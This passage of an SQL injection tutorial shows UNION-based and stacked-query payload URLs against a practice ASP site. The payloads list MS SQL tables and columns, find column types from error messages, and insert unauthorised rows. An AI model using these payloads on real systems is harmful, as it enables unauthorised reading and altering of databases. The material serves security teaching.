SELECT s.sID,s.title,s.blurb,s.story,a.aName,a.aNationali ty,a.aAge FROM story s, author a WHERE sID=999 AND a.aID=s.aID UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype='U'
This translates into the following URL:
_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%
201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20x type='U'-- [/b]
[b]The page that results has the text "author" (circled in red) where we expected to see the poet's age, and the other fields are filled with the numbers one through six instead of valid information.
A couple of points:
a) 1,2,3,4,5,6,name are used arbitrarily to fill the fields with junk data. Only the last field, name, is important.
b) Occasionally an error will say the wrong data type has been used. In such cases, the field generating the error must be determined and switched to something quoted eg 'one'
c) 'name' is used because it is the value being sought. In the sysObjects table the column 'name' contains the table names.
d) A double dash must be added at the end to comment the remainder of the original statement. �
The attacker now has the name of one of the tables - author. Now they get the other one.
http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3 ,4,
5,6,name%20FROM%20sysObjects%20WHERE%20(xtype='U'% 20AND%20(name<>'author'%20))--
They now have two tables, author and story, with at least the following properties:
a.author: aID, aName,aNationality,aAge
s.story: sID,aID, title,blurb,story
Checking cannot be overdone in SQL injection. Here, it is necessary to check that these are the complete lists of columns in each of the tables. The SysObjects table can also be used for that, but instead of calling the column 'name' they call the column 'info', which contains the number of columns in a given table.
The syntax is as follows:
_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3 ,4
,5,6,info%20FROM%20sysObjects%20WHERE%20(name='aut hor')--
This returns 4 - so our author table is complete. But when story is run:
_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3 ,4,
5,6,info%20FROM%20sysObjects%20WHERE%20(name='stor y')--
This returns 6, a problem as we have only determined 5 of the columns.
The best way to find out the name of the remaining column is to again make use of the SysObjects table, but in conjunction with the SysColumns table as follows:
_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3 ,4,5,6,sys
Columns.name%20FROM%20sysObjects,sysColumns%20WHER E%20(sysObjects.id=sysColumns.id AND sysObjects.name='story' AND sysColumns.name not like 'sID' AND sysColumns.name not like 'aID' AND sysColumns.name not like 'title' AND sysColumns.name not like 'blurb' AND sysColumns.name not like 'story')--
Which returns 'storydate' and then completes the table.
The last thing needing to be done before publishing a tome of poetry is to check on the type of each column. Strictly speaking in this example it is not necessary, but just to be thorough this is how it is done:
_http://stuart/homebase/practical/index.asp?story=334%20union%20select%20sum(aID)%20 from%20author--
Determining the column type again comes down to reading error messages, iterating through each column and running a SUM on it. If the field is numeric the following error (off the above URL) appears:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/homebase/practical/index.asp, line 20
However if the field is a text field this error is generated:
http://stuart/homebase/practical/index.asp?story=334%20union
%20select%20sum(aName)%20from%20author--
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/homebase/practical/index.asp, line 20
By running through this process, the following is known:
a.author: aID(int), aName(varchar),aNationality(varchar),aAge(varchar)
s.story: sID(int),aID(int), title(varchar),blurb(varchar),story(varchar),story date(varchar)
Adding unauthorised data
With the information garnered in the database foot printing section, it is now possible to inject a valid INSERT statement to the database.
First the attacker needs to enter the poet name (author), for instance as follows:
INSERT INTO author VALUES ('Dante','Italian','89')
_http://stuart/homebase/practical/index.asp?story=999;INSERT%20INTO%20author%20
VALUES%20('Dante','Italian','89')--
No error message appears, the record appears to have been entered correctly. However, the aID, which needs to be entered into the story table remains unknown.
To obtain this, it's necessary to run another query:
_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3 ,4,
5,6,aID%20FROM%20author%20WHERE%20(aName='Dante')--
Which returns 10 - the aID for Dante.
The last step is to insert the poem into the story table.
s.story: sID(int),aID(int), title(varchar),blurb(varchar),story(varchar),story date(varchar)
Taking a guess at the INSERT statement, produces something like this:
INSERT INTO story VALUES (10,'I love som tam','som tam is a spicy Thai salad and this is a poem about it','som tam is so spicy,<br>It makes my mouth burn')
Which gives us the following URL:
_http://stuart/homebase/practical/index.asp?story=999; INSERT INTO story VALUES (10,'I love som tam','som tam is a spicy Thai salad and this is a poem about it','som tam is so spicy,<br>It makes my mouth burn','2000/12/12')--
When this returns no error, it is still necessary to establish the ID of the story, which is done similarly to establishing the author ID. In this case it is 9.
_http://stuart/homebase/practical/index.asp?story=9
(c)governmentsecurity.org